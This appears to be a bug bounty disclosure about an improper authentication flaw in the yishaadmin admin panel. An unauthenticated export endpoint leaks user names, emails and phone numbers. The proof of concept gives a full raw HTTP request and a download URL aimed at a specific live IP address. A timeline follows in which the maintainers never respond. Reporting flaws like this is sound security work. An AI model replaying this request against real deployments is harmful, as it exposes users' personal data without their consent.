Improper Authentication in liukuo362573/yishaadmin
Valid
Reported on
Jan 24th 2022
Description
Hi, I would like to report an improper authentication vulnerability in https://www.github.com/liukuo362573/yishaadmin. Endpoint "/admin/OrganizationManage/User/ExportUserJson" does not require any authentication and return xls file contain users data like username, fullname, email, phone.
Proof of Concept
- Step 1: using BurpSuite and call this request
POST /admin/OrganizationManage/User/ExportUserJson HTTP/1.1
Host: 106.14.124.170
Content-Length: 65
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://106.14.124.170
Referer: http://106.14.124.170/admin/OrganizationManage/User/UserIndex
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
DepartmentId=&UserName=&Mobile=&UserStatus=-1&StartTime=&EndTime=
- Step 2: Get Data in response and go to "http://106.14.124.170/admin/" + Data to download all users data. Example: http://106.14.124.170/admin/Resource/Export/Excel/259208c46e9f4bedb1c64bac56d9f16c_%E7%94%A8%E6%88%B7%E5%88%97%E8%A1%A8.xls
Impact
Unauthenticated user can get the data off all users in application.
We are processing your report and will contact the
liukuo362573/yishaadmin
team within 24 hours.
a year ago
We have contacted a member of the
liukuo362573/yishaadmin
team and are waiting to hear back
a year ago
We have sent a
follow up to the
liukuo362573/yishaadmin
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
liukuo362573/yishaadmin
team.
We will try again in 10 days.
a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation